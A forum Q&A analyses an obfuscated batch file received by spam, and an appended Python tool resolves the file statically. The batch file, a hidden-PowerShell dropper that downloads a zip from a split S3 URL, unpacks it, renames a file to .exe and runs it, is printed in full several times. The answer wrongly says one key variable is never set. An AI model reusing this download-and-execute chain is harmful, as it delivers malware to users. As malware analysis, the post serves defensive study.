What would this Windows batch file do

Posted: 2021-05-23 23:12:19

Question:

I received this program via spam, and I don't know what it would do if I executed it.

Although I use macOS and know it can't damage my machine, I'm pretty sure it's some kind of virus, so I'd like to understand it.

My guess is that it changes the values of characters to other characters to make it unreadable.

There is also a fragmented link at the end.

cls
@echo off
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1, 1, %len%) do (
  set /A rnd_index=!RANDOM! * %len_charpool% / 32768
  for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)
set ZdHy_v_fyF=a
set ZgGEYqErM___uhIAWjNJ=b
set P__JXjQl____B_zA=c
set Cnj_NdJ=d
set XivmzFFG___rc_I=e
set MGE_Jp_yjrnuydCY__zWudMUmm__A=f
set ICMPRKHvGxGlqYbvqU=g
set CnNaDuPWL__aCJbmYawO_XjI_yQ=h
set Yq_cgTV___OgMaat_VfP=i
set MJcfRtoeVwMDZ=j
set IyypGJJHieiPDkK_VvH_kWaBDADfU=k
set ST__sVoOCkBtOSu_HC=l
set DqJ_t_keWA_uetGRNsrgZCelOIQ=m
set Bpnnp_SNZcQBiJN=n
set MMvmaGXgBQ_nHZ=o
set EuxpUwQe_bUWbrg_KQ=p
set OOhhHfJZYpK_Y=q
set OQLPyY=r
set ZmWecoFDM=s
set LHJiJU=t
set SbVCD=u
set DrxJWqvnnMzGPCWhMQ=v
set XfyZEmN_UzM_tAlI=w
set IDHE_R=x
set I_Ohy_MOkJQDcatjk_pX=y
set LFgTA_NYO_YBpU=z
set AfyLB_hDkohaG=0
set Bi__eZ_rqfjZTdY_QJ_W_nuNKFMkVFM=1
set SRW_ft_avO_FuMY=2
set Y_A_q_TYWVQbqF_qQ__ncLfolUsDI=3
set IBuFjVvfpcx_f_yYNCj_cZjJczmV=4
set ZcDjFcQHZ_zMIALohJYzEBILhH=5
set LHaI_YWR_Yr_xdGET__s_ChnMfJTMC=6
set FtOBCHc__YEKXfREpPT__xqKJStxdZS=7
set YddJGsUdIcc_HF=8
set EsTG_b_ew_TaPO=9

set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"

set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
powershell.exe -windowstyle hidden -Command  "& Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%');foreach($item in $zip.items())$shell.Namespace('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;Start-Process ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')" 

Comments:

Was there any enticement to invoke the script? It could be part of a blended attack. If you received this mail on a machine you use for work, report it to your company's admins/security people right away.

Answer 1:

Apologies for the long delay. Life intervened several times...

Starting with the first block:

set len=3
set charpool=0123456789abcdefghijlmnopqrstuvxz
set len_charpool=16
set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=
for /L %%b IN (1, 1, %len%) do (
  set /A rnd_index=!RANDOM! * %len_charpool% / 32768
  for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do set NHCf_bQIkNU_N_DE__KlMM_YNchRbY=!NHCf_bQIkNU_N_DE__KlMM_YNchRbY!%%i
)

Renaming things so as not to trigger any local alerts we have:

>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _altPool=
@for /L %%b IN (1, 1, %len%) do @(
    @set /A rnd_index=!RANDOM! * %len_charpool% / 32768
    @for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _altPool=!_altPool!%%i
    @echo _altPool == !_altPool!
)


>test.cmd
_altPool == 1
_altPool == 11
_altPool == 11a
>

So it appears to generate three random characters into NHCf_bQIkNU_N_DE__KlMM_YNchRbY.

Lines 12..47 create randomly named environment variables set to lowercase ASCII alphanumeric characters, but they are not used anywhere in the batch script. They may just be a poor attempt at obfuscation, or they may be used later by another payload, perhaps to avoid detection by some lame entropy check.

#49 seems to be obfuscation. It does reference the three characters in NHCf_bQIkNU_N_DE__KlMM_YNchRbY, but ghdt2d is never used in the script:

set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%

Immediately followed by:

set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%

S_p_BzRKgYKgQ_KCn_LF is used later in the script:

Find all "S_p_BzRKgYKgQ_KCn_LF"
File Untitled<1>
  50 5:set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
  51 22:set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
  58 70:set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
  66 481:...T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%D...  [line truncated]
  66 586:..._YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsL...  [line truncated]
  66 729:...V_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')"  [line truncated]
Total found: 6

Now it gets interesting...

Lines 50..60 seem to be setting path/filename variables, with more obfuscation than the rest of the script.

set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN2%
IF EXIST  %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN% GOTO FIM
mkdir %DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.exe"

There is no goto FIM label in the script, so these appear to be an obfuscated way of exiting the script if those filesystem objects exist.

The updated test script produces:

>type test.cmd
@setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
@set len=3
@set charpool=0123456789abcdefghijlmnopqrstuvxz
@set len_charpool=16
@set _entropy=
@for /L %%b IN (1, 1, %len%) do @(
    @set /A rnd_index=!RANDOM! * %len_charpool% / 32768
    @for /F %%i in ('echo %%charpool:~!rnd_index!^,1%%') do @set _entropy=!_entropy!%%i
    @echo _entropy == !_entropy!
)

set _zipFileName= --___--_%_entropy%
REM Obfuscation: set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set _zipFileDirectory=%Programdata%\--___--_%_entropy%
set _zipFileDirectory2=%Programdata%\T__aB__VtZ_CAgauukskJ_oFeEW_fG
@IF EXIST  %_zipFileDirectory2% GOTO FIM
REM mkdir %_zipFileDirectory2%
@IF EXIST  %_zipFileDirectory% GOTO FIM
REM mkdir %_zipFileDirectory%
set _zipPathFileName=%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.zip
REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%_zipFileDirectory%\dump.dmp"
REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "%_zipFileDirectory%\dump2.exe"

set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
REM powershell.exe -windowstyle hidden -Command  "& Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');foreach($item in $zip.items())$shell.Namespace('%_zipFileDirectory%').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%_zipPathFileName%';Start-Sleep -s 5 ;Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')"



>test.cmd
_entropy == 4
_entropy == 45
_entropy == 45b

>set _zipFileName= --___--_45b

>REM Obfuscation: set LEG_bBk_Nyos_T=

>set _zipFileDirectory=C:\ProgramData\--___--_

>set _zipFileDirectory2=C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG

>REM mkdir C:\ProgramData\T__aB__VtZ_CAgauukskJ_oFeEW_fG

>REM mkdir C:\ProgramData\--___--_

>set _zipPathFileName=C:\ProgramData\--___--_\.zip

>REM Ofbuscation: set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "C:\ProgramData\--___--_\dump.dmp"

>REM Obfuscation: set RRCkcy_jdqfrz_lqSpedbgI_jj_i_D= "C:\ProgramData\--___--_\dump2.exe"

>set dado1="http"

>set dado2="s://corni43uuy.s3"

>set dado3="-eu-west-1.am"

>set dado4="azonaws.com/image2.png"

>REM powershell.exe -windowstyle hidden -Command  "& Import-Module BitsTransfer;Start-BitsTransfer ('"http""s://corni43uuy.s3""-eu-west-1.am""azonaws.com/image2.png"') 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('C:\ProgramData\--___--_\.zip');foreach($item in $zip.items())$shell.Namespace('C:\ProgramData\--___--_').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('C:\ProgramData\--___--_\dump.dmp') -newname ('.dmp');rename-item -path ('C:\ProgramData\--___--_\dump2.dmp') -newname ('.exe');remove-item 'C:\ProgramData\--___--_\.zip';Start-Sleep -s 5 ;Start-Process ('C:\ProgramData\--___--_\.exe')"
>

Leaving only the final PS invocation, which can be reformatted like this:


   Import-Module BitsTransfer;
   Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%_zipPathFileName%';
   Start-Sleep -s 5 ;
   $shell = new-object -com shell.application;$zip = $shell.NameSpace('%_zipPathFileName%');
   foreach($item in $zip.items())
   
      $shell.Namespace('%_zipFileDirectory%').copyhere($item);
   ;
   Start-Sleep -s 5 ;
   rename-item -path ('%_zipFileDirectory%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');
   rename-item -path ('%_zipFileDirectory%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');
   remove-item '%_zipPathFileName%';
   Start-Sleep -s 5 ;
   Start-Process ('%_zipFileDirectory%\%S_p_BzRKgYKgQ_KCn_LF%.exe')

The one remaining original variable, S_p_BzRKgYKgQ_KCn_LF, is never set by the script, so it will be empty. I suspect this script doesn't work as intended. But the intent seems to be either to waste our time analysing it, or possibly to download and execute something. Without access to the image file it's impossible to know exactly what it does.

The image file referenced at https://corni43uuy.s3-eu-west-1.amazonaws.com/image2.png is no longer available:

<Error>
 <Code>AllAccessDisabled</Code>
 <Message>All access to this object has been disabled</Message>
 <RequestId>F6D9EB7F64EA04A4</RequestId> 
 <HostId>WCiK2wokFJup1kWVnCRqVX43sM2NPLFeuU/WnJ1PK4uqZvo1IhH0ppgn9o4nGxX2158jqsPw+wQ=</HostId>
</Error>

Google finds no references to that link.
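The answer resolves the script by hand-editing it and echoing the intermediate values. The same resolution can be done statically, which is safer when triaging a sample like this. The following Python script is an added example, not code from the question or the answer: it replays cmd.exe's parse-time %VAR% expansion over the `set` lines of the batch file (the for /L loop that builds the random three-character suffix is omitted and its result is seeded with "45b", the value the answer's test run produced; `C:\ProgramData` is a constructed value for %Programdata%), lists variables that are assigned but never referenced, reassembles the split URL, and reports the fully resolved PowerShell command together with the behaviours a detection rule would key on.

```python
"""Static resolver for the obfuscated batch dropper discussed above (added example)."""
import re

# Constructed sample: the `set` lines and the PowerShell line from the batch file
# in the question.  The random-suffix loop is omitted; its result is seeded below.
SAMPLE_BATCH = r"""
set ZdHy_v_fyF=a
set OQLPyY=r
set ghdt2d= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set S_p_BzRKgYKgQ_KCn_LF= --___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set LEG_bBk_Nyos_T= %S_p_BzRKgYKgQ_KCn_LF%
set DlnV_YXDe_ov_hczSaG_lUoz_T_YnN=%Programdata%\--___--_%NHCf_bQIkNU_N_DE__KlMM_YNchRbY%
set Dl_pgTsLKvB_YUzB_quExlvqy_jMpO=%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.zip
set S_GnTbYypHUDTs_ZLgau_Mdi_B__kG = "%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp"
set dado1="http"
set dado2="s://corni43uuy.s3"
set dado3="-eu-west-1.am"
set dado4="azonaws.com/image2.png"
powershell.exe -windowstyle hidden -Command  "& Import-Module BitsTransfer;Start-BitsTransfer ('%dado1%%dado2%%dado3%%dado4%') '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;$shell = new-object -com shell.application;$zip = $shell.NameSpace('%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%');foreach($item in $zip.items())$shell.Namespace('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%').copyhere($item);;Start-Sleep -s 5 ;rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.dmp');rename-item -path ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\dump2.dmp') -newname ('%S_p_BzRKgYKgQ_KCn_LF%.exe');remove-item '%Dl_pgTsLKvB_YUzB_quExlvqy_jMpO%';Start-Sleep -s 5 ;Start-Process ('%DlnV_YXDe_ov_hczSaG_lUoz_T_YnN%\%S_p_BzRKgYKgQ_KCn_LF%.exe')"
"""

# Seed values (constructed): a typical %Programdata%, and "45b" standing in for the
# three random characters, the value the answer's own test run happened to produce.
SEED_ENV = {"Programdata": r"C:\ProgramData", "NHCf_bQIkNU_N_DE__KlMM_YNchRbY": "45b"}

SET_RE = re.compile(r"^\s*@?set\s+([^=/][^=]*)=(.*)$", re.IGNORECASE)   # skips `set /A`
VAR_RE = re.compile(r"%([^%]+)%")
PS_RE = re.compile(r'powershell(?:\.exe)?\s+(.*?)-Command\s+"(.*)"\s*$', re.IGNORECASE)
EXE_RE = re.compile(r"Start-Process\s*\('([^']*)'\)", re.IGNORECASE)

# Behaviours a detection rule for this dropper pattern would key on.
INDICATORS = [
    ("hidden window", re.compile(r"-windowstyle\s+hidden", re.I)),
    ("BITS download", re.compile(r"Start-BitsTransfer", re.I)),
    ("shell.application unzip", re.compile(r"shell\.application", re.I)),
    ("rename to .exe", re.compile(r"rename-item.*\.exe", re.I)),
    ("execute dropped file", re.compile(r"Start-Process", re.I)),
]


def expand(value, env):
    """cmd.exe parse-time expansion: %NAME% is case-insensitive, and a name that is
    not defined expands to nothing inside a batch file."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), ""), value)


def parse_sets(batch_text, seed_env):
    """Replay the `set` lines in order.  cmd keeps spaces on both sides of '=':
    `set X = y` defines a variable literally named "X ", and `set X= y` stores " y"."""
    env = {k.lower(): v for k, v in seed_env.items()}
    names = []                                   # assignment order, names as written
    for line in batch_text.splitlines():
        m = SET_RE.match(line)
        if m:
            name, value = m.groups()
            names.append(name)
            env[name.lower()] = expand(value, env)
    return env, names


def find_unused(batch_text, names):
    """Variables assigned somewhere but never referenced as %NAME% (pure decoys)."""
    referenced = {r.lower() for r in VAR_RE.findall(batch_text)}
    return [n for n in names if n.lower() not in referenced]


def reconstruct_url(env):
    """The four dado* pieces as cmd actually passes them (double quotes included,
    because `set dado1="http"` keeps the quotes) and the URL they were meant to form."""
    parts = [env.get(f"dado{i}", "") for i in range(1, 5)]
    return "".join(parts), "".join(p.strip('"') for p in parts)


def resolve_powershell(batch_text, env):
    """Return (flags, command) of the first powershell invocation, %VAR%s resolved."""
    for line in batch_text.splitlines():
        m = PS_RE.search(line)
        if m:
            return m.group(1).strip(), expand(m.group(2), env)
    return "", ""


def analyse(batch_text, seed_env):
    env, names = parse_sets(batch_text, seed_env)
    flags, ps_cmd = resolve_powershell(batch_text, env)
    url_as_passed, url_intended = reconstruct_url(env)
    exe = EXE_RE.search(ps_cmd)
    return {
        "env": env,
        "unused": find_unused(batch_text, names),
        "powershell": ps_cmd,
        "indicators": [name for name, rx in INDICATORS if rx.search(flags + " " + ps_cmd)],
        "url_as_passed": url_as_passed,
        "url_intended": url_intended,
        "dropped_exe": exe.group(1) if exe else "",
    }


if __name__ == "__main__":
    report = analyse(SAMPLE_BATCH, SEED_ENV)
    print("decoy variables :", [repr(n) for n in report["unused"]])
    print("URL as passed   :", report["url_as_passed"])
    print("URL intended    :", report["url_intended"])
    print("dropped exe     :", repr(report["dropped_exe"]))
    print("indicators      :", ", ".join(report["indicators"]))
    print("resolved PS     :", report["powershell"])
```

Two things the resolved output makes visible that hand-tracing easily misses: the `set ... = "..."` line defines a variable whose name ends in a space (so it can never be referenced), and every path built from S_p_BzRKgYKgQ_KCn_LF gets a file name with a leading space, because cmd keeps the space after `=`. The `url_as_passed` value also shows the literal double quotes that end up inside the PowerShell string, which matches the answer's observation that the script probably does not work as written.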
